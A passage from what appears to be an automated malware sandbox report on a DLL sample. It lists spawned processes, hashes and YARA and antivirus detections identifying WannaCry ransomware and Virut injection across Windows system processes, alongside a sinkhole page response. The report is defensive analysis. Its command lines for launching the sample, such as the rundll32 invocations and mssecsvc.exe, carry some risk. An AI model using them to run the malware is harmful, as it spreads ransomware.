6f 6d 61 69 6e 20 68 61 73 20 62 65 65 6e 20 73 69 6e 6b 68 6f 6c 65 64 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6b 72 79 70 74 6f 73 6c 6f 67 69 63 2e 63 6f 6d 22 3e 4b 72 79 70 74 6f 73 20 4c 6f 67 69 63 3c 2f 61 3e 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                  Data Ascii: <!DOCTYPE html><html lang="en-us" class="no-js"><head><meta charset="utf-8"><title>Sinkholed by Kryptos Logic</title><meta name="description" content="Kryptos Logic Sinkhole"><meta name="viewport" content="width=device-width, initial-scale=1.0"><link href="//static.kryptoslogicsinkhole.com/style.css" rel="stylesheet" type="text/css"/></head><body class="flat"><div class="content"><div class="content-box"><div class="big-content"><div class="clear"></div></div><h1>Sinkholed!</h1><p>This domain has been sinkholed by <a href="https://www.kryptoslogic.com">Kryptos Logic</a>.</p></div></div></body></html>


                  Statistics

                  CPU Usage

                  Click to jump to process

                  Memory Usage

                  Click to jump to process

                  Behavior

                  Click to jump to process

                  System Behavior

                  General

                  Target ID:0
                  Start time:19:38:04
                  Start date:20/07/2022
                  Path:C:\Windows\System32\loaddll32.exe
                  Wow64 process (32bit):true
                  Commandline:loaddll32.exe "C:\Users\user\Desktop\HFKDS6VcNO.dll"
                  Imagebase:0x80000
                  File size:116736 bytes
                  MD5 hash:7DEB5DB86C0AC789123DEC286286B938
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Target ID:1
                  Start time:19:38:05
                  Start date:20/07/2022
                  Path:C:\Windows\SysWOW64\cmd.exe
                  Wow64 process (32bit):true
                  Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\HFKDS6VcNO.dll",#1
                  Imagebase:0xdd0000
                  File size:232960 bytes
                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Target ID:2
                  Start time:19:38:05
                  Start date:20/07/2022
                  Path:C:\Windows\SysWOW64\rundll32.exe
                  Wow64 process (32bit):true
                  Commandline:rundll32.exe C:\Users\user\Desktop\HFKDS6VcNO.dll,PlayGame
                  Imagebase:0xf90000
                  File size:61952 bytes
                  MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Target ID:3
                  Start time:19:38:05
                  Start date:20/07/2022
                  Path:C:\Windows\SysWOW64\rundll32.exe
                  Wow64 process (32bit):true
                  Commandline:rundll32.exe "C:\Users\user\Desktop\HFKDS6VcNO.dll",#1
                  Imagebase:0xf90000
                  File size:61952 bytes
                  MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Target ID:4
                  Start time:19:38:07
                  Start date:20/07/2022
                  Path:C:\Windows\mssecsvc.exe
                  Wow64 process (32bit):true
                  Commandline:C:\WINDOWS\mssecsvc.exe
                  Imagebase:0x400000
                  File size:3751936 bytes
                  MD5 hash:C69A376D234A2990509A077940306C82
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000004.00000000.381614610.0000000000710000.00000080.00000001.01000000.00000004.sdmp, Author: us-cert code analysis team
                  • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000004.00000000.382876162.000000000040F000.00000008.00000001.01000000.00000004.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000004.00000002.706619607.000000000040F000.00000008.00000001.01000000.00000004.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000004.00000000.385586477.000000000040F000.00000008.00000001.01000000.00000004.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000004.00000000.384164421.000000000040F000.00000008.00000001.01000000.00000004.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000004.00000002.708384122.0000000000B00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000004.00000000.383003497.0000000000710000.00000080.00000001.01000000.00000004.sdmp, Author: us-cert code analysis team
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000004.00000002.709969347.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000004.00000000.384240153.0000000000710000.00000080.00000001.01000000.00000004.sdmp, Author: us-cert code analysis team
                  • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000004.00000002.706767542.0000000000710000.00000080.00000001.01000000.00000004.sdmp, Author: us-cert code analysis team
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000004.00000002.708228244.0000000000A6B000.00000040.00000001.01000000.00000004.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000004.00000000.381472054.000000000040F000.00000008.00000001.01000000.00000004.sdmp, Author: Joe Security
                  • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000004.00000000.385681867.0000000000710000.00000080.00000001.01000000.00000004.sdmp, Author: us-cert code analysis team
                  • Rule: WannaCry_Ransomware, Description: Detects WannaCry Ransomware, Source: C:\Windows\mssecsvc.exe, Author: Florian Roth (with the help of binar.ly)
                  • Rule: WannaCry_Ransomware_Gen, Description: Detects WannaCry Ransomware, Source: C:\Windows\mssecsvc.exe, Author: Florian Roth (based on rule by US CERT)
                  • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: C:\Windows\mssecsvc.exe, Author: Joe Security
                  • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: C:\Windows\mssecsvc.exe, Author: us-cert code analysis team
                  • Rule: Win32_Ransomware_WannaCry, Description: unknown, Source: C:\Windows\mssecsvc.exe, Author: ReversingLabs
                  Antivirus matches:
                  • Detection: 100%, Avira
                  • Detection: 100%, Joe Sandbox ML
                  • Detection: 90%, Virustotal, Browse
                  • Detection: 83%, Metadefender, Browse
                  • Detection: 98%, ReversingLabs
                  Reputation:low

                  General

                  Target ID:5
                  Start time:19:38:09
                  Start date:20/07/2022
                  Path:C:\Windows\SysWOW64\rundll32.exe
                  Wow64 process (32bit):true
                  Commandline:rundll32.exe "C:\Users\user\Desktop\HFKDS6VcNO.dll",PlayGame
                  Imagebase:0xf90000
                  File size:61952 bytes
                  MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  General

                  Target ID:6
                  Start time:19:38:09
                  Start date:20/07/2022
                  Path:C:\Windows\mssecsvc.exe
                  Wow64 process (32bit):true
                  Commandline:C:\WINDOWS\mssecsvc.exe
                  Imagebase:0x400000
                  File size:3751936 bytes
                  MD5 hash:C69A376D234A2990509A077940306C82
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000006.00000000.388012447.000000000040F000.00000008.00000001.01000000.00000004.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000006.00000000.385980083.000000000040F000.00000008.00000001.01000000.00000004.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000006.00000002.471724107.000000000040F000.00000008.00000001.01000000.00000004.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000006.00000000.390959066.000000000040F000.00000008.00000001.01000000.00000004.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000006.00000000.392159166.000000000040F000.00000008.00000001.01000000.00000004.sdmp, Author: Joe Security
                  • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000006.00000002.471882688.0000000000710000.00000080.00000001.01000000.00000004.sdmp, Author: us-cert code analysis team
                  • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000006.00000000.391018672.0000000000710000.00000080.00000001.01000000.00000004.sdmp, Author: us-cert code analysis team
                  • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000006.00000000.388277654.0000000000710000.00000080.00000001.01000000.00000004.sdmp, Author: us-cert code analysis team
                  • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000006.00000000.392238630.0000000000710000.00000080.00000001.01000000.00000004.sdmp, Author: us-cert code analysis team
                  • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000006.00000000.386126124.0000000000710000.00000080.00000001.01000000.00000004.sdmp, Author: us-cert code analysis team
                  Reputation:low

                  General

                  Target ID:7
                  Start time:19:38:11
                  Start date:20/07/2022
                  Path:C:\Windows\System32\winlogon.exe
                  Wow64 process (32bit):false
                  Commandline:winlogon.exe
                  Imagebase:0x7ff6d9470000
                  File size:677376 bytes
                  MD5 hash:F9017F2DC455AD373DF036F5817A8870
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000007.00000002.902197478.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000007.00000000.398152684.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000007.00000002.902600386.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000007.00000000.398121607.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000007.00000000.389559026.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security

                  General

                  Target ID:8
                  Start time:19:38:13
                  Start date:20/07/2022
                  Path:C:\Windows\System32\lsass.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\lsass.exe
                  Imagebase:0x7ff7d6b10000
                  File size:57976 bytes
                  MD5 hash:317340CD278A374BCEF6A30194557227
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000008.00000000.392885761.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000008.00000002.902167065.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000008.00000002.902569116.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000008.00000000.400454619.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000008.00000000.400467949.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security

                  General

                  Target ID:9
                  Start time:19:38:14
                  Start date:20/07/2022
                  Path:C:\Windows\mssecsvc.exe
                  Wow64 process (32bit):true
                  Commandline:C:\WINDOWS\mssecsvc.exe -m security
                  Imagebase:0x400000
                  File size:3751936 bytes
                  MD5 hash:C69A376D234A2990509A077940306C82
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000009.00000002.487557526.0000000000A80000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000009.00000000.396243293.000000000040F000.00000008.00000001.01000000.00000004.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000009.00000002.486435821.000000000040F000.00000008.00000001.01000000.00000004.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000009.00000002.487502234.0000000000A6B000.00000040.00000001.01000000.00000004.sdmp, Author: Joe Security
                  • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000009.00000002.486575854.0000000000710000.00000080.00000001.01000000.00000004.sdmp, Author: us-cert code analysis team
                  • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000009.00000000.396301371.0000000000710000.00000080.00000001.01000000.00000004.sdmp, Author: us-cert code analysis team

                  General

                  Target ID:10
                  Start time:19:38:16
                  Start date:20/07/2022
                  Path:C:\Windows\System32\fontdrvhost.exe
                  Wow64 process (32bit):false
                  Commandline:fontdrvhost.exe
                  Imagebase:0x7ff646210000
                  File size:790304 bytes
                  MD5 hash:31113981180E69C2773BCADA4051738A
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000A.00000002.902190830.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000A.00000002.902164600.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000A.00000000.404780139.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000A.00000000.399314141.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000A.00000000.404750620.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security

                  General

                  Target ID:11
                  Start time:19:38:17
                  Start date:20/07/2022
                  Path:C:\Windows\System32\fontdrvhost.exe
                  Wow64 process (32bit):false
                  Commandline:fontdrvhost.exe
                  Imagebase:0x7ff646210000
                  File size:790304 bytes
                  MD5 hash:31113981180E69C2773BCADA4051738A
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000B.00000000.405766491.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000B.00000000.405750585.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000B.00000002.902186533.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000B.00000002.902526140.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000B.00000000.401684447.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security

                  General

                  Target ID:12
                  Start time:19:38:18
                  Start date:20/07/2022
                  Path:C:\Windows\System32\svchost.exe
                  Wow64 process (32bit):false
                  Commandline:c:\windows\system32\svchost.exe -k dcomlaunch -p -s PlugPlay
                  Imagebase:0x7ff7e8070000
                  File size:51288 bytes
                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000C.00000000.407748268.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000C.00000002.902187383.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000C.00000002.902489489.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000C.00000000.405270747.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000C.00000000.407730501.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security

                  General

                  Target ID:13
                  Start time:19:38:19
                  Start date:20/07/2022
                  Path:C:\Windows\System32\svchost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\svchost.exe -k DcomLaunch -p
                  Imagebase:0x7ff7e8070000
                  File size:51288 bytes
                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000D.00000000.408695665.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000D.00000000.407147003.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000D.00000002.902577911.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000D.00000002.902196541.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000D.00000000.408708378.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security

                  General

                  Target ID:14
                  Start time:19:38:23
                  Start date:20/07/2022
                  Path:C:\Windows\System32\svchost.exe
                  Wow64 process (32bit):false
                  Commandline:c:\windows\system32\svchost.exe -k rpcss -p
                  Imagebase:0x7ff7e8070000
                  File size:51288 bytes
                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                  Has elevated privileges:true
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000E.00000002.902198033.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000E.00000000.415723694.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000E.00000000.415704475.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000E.00000000.416257871.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000E.00000002.902542043.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000E.00000000.416244851.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security

                  General

                  Target ID:17
                  Start time:19:38:27
                  Start date:20/07/2022
                  Path:C:\Windows\System32\svchost.exe
                  Wow64 process (32bit):false
                  Commandline:c:\windows\system32\svchost.exe -k dcomlaunch -p -s LSM
                  Imagebase:0x7ff7e8070000
                  File size:51288 bytes
                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000011.00000000.422292285.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000011.00000002.902195963.000000007FFD0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000011.00000000.422258384.000000007FFD0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000011.00000000.422807100.000000007FFD0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000011.00000000.422852544.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000011.00000002.902605125.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security

                  General

                  Target ID:18
                  Start time:19:38:28
                  Start date:20/07/2022
                  Path:C:\Windows\System32\dwm.exe
                  Wow64 process (32bit):false
                  Commandline:dwm.exe
                  Imagebase:0x7ff65a250000
                  File size:62464 bytes
                  MD5 hash:70073A05B2B43FFB7A625708BB29E7C7
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000012.00000000.424968557.000000007FFD0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000012.00000000.424980643.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000012.00000000.425355415.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000012.00000000.425337469.000000007FFD0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security

                  General

                  Target ID:19
                  Start time:19:38:45
                  Start date:20/07/2022
                  Path:C:\Windows\tasksche.exe
                  Wow64 process (32bit):false
                  Commandline:C:\WINDOWS\tasksche.exe /i
                  Imagebase:0x400000
                  File size:3514368 bytes
                  MD5 hash:3233ACED9279EF54267C479BBA665B90
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000013.00000002.468486627.000000000040E000.00000008.00000001.01000000.00000005.sdmp, Author: us-cert code analysis team
                  • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000013.00000000.463303050.000000000040E000.00000008.00000001.01000000.00000005.sdmp, Author: us-cert code analysis team
                  • Rule: WannaCry_Ransomware, Description: Detects WannaCry Ransomware, Source: C:\Windows\tasksche.exe, Author: Florian Roth (with the help of binar.ly)
                  • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: C:\Windows\tasksche.exe, Author: us-cert code analysis team
                  • Rule: Win32_Ransomware_WannaCry, Description: unknown, Source: C:\Windows\tasksche.exe, Author: ReversingLabs
                  Antivirus matches:
                  • Detection: 100%, Avira
                  • Detection: 100%, Joe Sandbox ML
                  • Detection: 90%, Virustotal, Browse
                  • Detection: 85%, Metadefender, Browse
                  • Detection: 95%, ReversingLabs

                  General

                  Target ID:20
                  Start time:19:38:57
                  Start date:20/07/2022
                  Path:C:\Windows\System32\svchost.exe
                  Wow64 process (32bit):false
                  Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                  Imagebase:0x7ff7e8070000
                  File size:51288 bytes
                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000014.00000002.902195308.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000014.00000000.487438968.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security

                  General

                  Target ID:21
                  Start time:19:38:58
                  Start date:20/07/2022
                  Path:C:\Windows\System32\svchost.exe
                  Wow64 process (32bit):
                  Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p
                  Imagebase:
                  File size:51288 bytes
                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                  Has elevated privileges:true
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000015.00000002.902195437.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000015.00000000.490758156.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security

                  General

                  Target ID:22
                  Start time:19:39:04
                  Start date:20/07/2022
                  Path:C:\Windows\System32\svchost.exe
                  Wow64 process (32bit):false
                  Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s lmhosts
                  Imagebase:0x7ff7e8070000
                  File size:51288 bytes
                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000016.00000002.902191414.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000016.00000000.503757113.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security

                  General

                  Target ID:23
                  Start time:19:39:05
                  Start date:20/07/2022
                  Path:C:\Windows\System32\svchost.exe
                  Wow64 process (32bit):false
                  Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s TimeBrokerSvc
                  Imagebase:0x7ff7e8070000
                  File size:51288 bytes
                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000017.00000002.902194677.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000017.00000000.505888524.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security

                  General

                  Target ID:24
                  Start time:19:39:07
                  Start date:20/07/2022
                  Path:C:\Windows\System32\svchost.exe
                  Wow64 process (32bit):false
                  Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s Schedule
                  Imagebase:0x7ff7e8070000
                  File size:51288 bytes
                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000018.00000002.902194188.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000018.00000000.509831563.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security

                  General

                  Target ID:25
                  Start time:19:39:16
                  Start date:20/07/2022
                  Path:C:\Windows\System32\svchost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\svchost.exe -k LocalService -p
                  Imagebase:0x7ff7e8070000
                  File size:51288 bytes
                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                  Has elevated privileges:true
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000019.00000002.902194107.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000019.00000000.529226941.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security

                  General

                  Target ID:26
                  Start time:19:39:18
                  Start date:20/07/2022
                  Path:C:\Windows\System32\svchost.exe
                  Wow64 process (32bit):false
                  Commandline:c:\windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                  Imagebase:0x7ff7e8070000
                  File size:51288 bytes
                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
